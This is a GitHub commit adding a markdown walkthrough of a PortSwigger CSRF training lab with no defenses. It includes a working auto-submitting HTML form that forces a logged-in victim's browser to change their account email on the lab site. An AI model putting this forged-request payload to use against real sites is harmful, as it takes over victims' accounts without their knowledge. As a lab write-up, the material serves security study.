Create Lab1.md

This commit is contained in:
ARZ 2021-12-03 10:38:19 +05:00 committed by GitHub
parent 5e859397c5
commit 8471c4a923
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

35
Portswigger/CSRF/Lab1.md Normal file
View file

@ -0,0 +1,35 @@
# Portswigger CSRF Lab - 1
## CSRF vulnerability with no defenses
In this lab we have to perfrom CSRF (Cross Site Request Forgery) which allows a user to make unintentional requests like changing user's email address which is the objective of this lab
<img src="https://i.imgur.com/YmaHQoB.png"/>
We are given credentials to log into our account
<img src="https://i.imgur.com/6qHauWq.png"/>
We can update the email address from this page but this isn't the way we have to update it
<img src="https://i.imgur.com/A1papzn.png"/>
If we look at the source code we can see the html for this form
<img src="https://i.imgur.com/IXAAA6q.png"/>
We have `Go to exploit ` server (I don't have it now since I have solved this lab) , so going to that we will have options like `store` , `exploit` ,`deliver exploit` and `access logs` so first we need to craf a csrf exploit for that we need to copy the same html form content and in `action` paramter we add the url with `/my-account/change-email`
```html
<html>
<body>
<form action="https://ac771fae1eadea59c0730ef5005c00f2.web-security-academy.net/my-account/change-email" method="POST">
<input required type="hidden" name="email" value="ez@swigger.com">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
It's not necessary to make the input hidden but real csrf attacks like this where you don't see any input when you click a link and something happens in the back , so this request will make the email changed to ez@swigger.com and with this we completed this lab